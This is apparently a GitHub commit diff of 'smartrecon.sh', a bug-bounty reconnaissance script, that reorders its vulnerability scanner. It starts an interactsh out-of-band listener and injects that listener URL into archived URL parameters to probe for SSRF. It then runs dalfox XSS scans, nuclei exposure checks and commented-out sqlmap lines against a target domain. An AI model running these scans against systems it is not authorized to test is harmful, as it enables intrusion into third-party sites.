Skip to content

Commit 41992fc

Browse files
kh4sh3ikh4sh3i
committed
first call ssrf attack then xss
1 parent fb84ee7 commit 41992fc

File tree

1 file changed

+16
-15
lines changed

1 file changed

+16
-15
lines changed

smartrecon.sh

Lines changed: 16 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -195,12 +195,27 @@ vulnscanner(){
195195
cat ./$domain/$foldername/urllist.txt | nuclei -tags exposure,unauth,cache -o ./$domain/$foldername/nuclei.txt -silent; notify -bulk -data ./$domain/$foldername/nuclei.txt -silent
196196

197197

198+
echo -e "${green}Starting up listen server...${reset}"
199+
interactsh-client -v &> ./$domain/$foldername/listen_server.txt & SERVER_PID=$!
200+
sleep 5 # to properly start listen server
201+
LISTENSERVER=$(tail -n 1 ./$domain/$foldername/listen_server.txt)
202+
LISTENSERVER=$(echo $LISTENSERVER | cut -f2 -d ' ')
203+
echo "Listen server is up $LISTENSERVER with PID=$SERVER_PID"
204+
205+
206+
echo -e "${green}find SSRF vulnerability ...${reset}"
207+
cat ./$domain/$foldername/waybackurls.txt | gf ssrf | qsreplace https://$LISTENSERVER | httpx -silent | tee ./$domain/$foldername/ssrf_url.txt
208+
notify -bulk -data ./$domain/$foldername/ssrf_url.txt -silent
209+
210+
# kill listen server
211+
kill_listen_server
212+
213+
198214
echo -e "${green}find Xss vulnerability ...${reset}"
199215
python3 $paramspider -d $domain -s TRUE -e jpg,jpeg,gif,css,js,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt,eot -q -o ./$domain/$foldername/xss_result.txt
200216
cat ./$domain/$foldername/xss_result.txt | qsreplace -a | httpx -silent -threads 500 -mc 200 | dalfox pipe -S | tee ./$domain/$foldername/xss_raw_result.txt
201217
cat ./$domain/$foldername/xss_raw_result.txt | cut -d ' ' -f2 | tee ./$domain/$foldername/xss_result.txt; notify -bulk -data ./$domain/$foldername/xss_result.txt -silent
202218

203-
204219
# echo -e "${green}find sql injection with wayback ...${reset}"
205220
# python3 paramspider.py -d $domain -s TRUE -e woff,ttf,eot,css,js,png,svg,jpg | deduplicate --sort | httpx -silent | sqlmap
206221

@@ -216,20 +231,6 @@ vulnscanner(){
216231
# echo -e "${green}find dom xss with parameter pollution vulnerability ...${reset}"
217232
# cat ./$domain/$foldername/waybackurls.txt | httpx -silent | ppmap
218233

219-
echo -e "${green}Starting up listen server...${reset}"
220-
interactsh-client -v &> ./$domain/$foldername/listen_server.txt & SERVER_PID=$!
221-
sleep 5 # to properly start listen server
222-
LISTENSERVER=$(tail -n 1 ./$domain/$foldername/listen_server.txt)
223-
LISTENSERVER=$(echo $LISTENSERVER | cut -f2 -d ' ')
224-
echo "Listen server is up $LISTENSERVER with PID=$SERVER_PID"
225-
226-
227-
echo -e "${green}find SSRF vulnerability ...${reset}"
228-
cat ./$domain/$foldername/waybackurls.txt | gf ssrf | qsreplace https://$LISTENSERVER | httpx -silent | tee ./$domain/$foldername/ssrf_url.txt
229-
notify -bulk -data ./$domain/$foldername/ssrf_url.txt -silent
230-
231-
# kill listen server
232-
kill_listen_server
233234
}
234235

235236

0 commit comments

Comments
 (0)